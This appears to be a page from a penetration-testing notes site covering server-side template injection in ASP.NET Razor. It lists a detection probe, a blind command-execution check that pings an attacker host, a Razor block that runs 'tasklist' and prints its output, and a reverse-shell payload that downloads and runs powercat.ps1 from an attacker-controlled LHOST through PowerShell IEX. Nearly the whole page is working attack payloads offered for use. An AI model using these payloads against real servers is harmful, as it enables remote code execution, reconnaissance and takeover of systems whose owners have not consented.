SSTI ASP

ASP Razor Engine

Detection

@(8*9)

RCE Check - Blind - Wait a minute

@{System.Diagnostics.Process.Start("cmd.exe","/c ping -n 2 LHOST");}

Task List

@{
    System.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo("cmd", "/c tasklist /v");

    procStartInfo.RedirectStandardOutput = true;
    procStartInfo.RedirectStandardError = true;
    procStartInfo.UseShellExecute = false;
    procStartInfo.CreateNoWindow = true;
    System.Diagnostics.Process p = new System.Diagnostics.Process();
    p.StartInfo = procStartInfo;
    p.Start();
    var stdout = p.StandardOutput.ReadToEnd().Replace("<", "&lt;").Replace(">", "&gt;");
    var stderr = p.StandardError.ReadToEnd().Replace("<", "&lt;").Replace(">", "&gt;");
}
<pre>@stdout</pre>
<pre style="color: red">@stderr</pre>

Reverse Shell Powercat - OK

@{System.Diagnostics.Process.Start("cmd.exe","/c powershell -nop -c IEX(New-Object System.Net.WebClient).DownloadString('http://LHOST/powercat.ps1')");}

NextBurp AWS Socks5

Last updated 7 months ago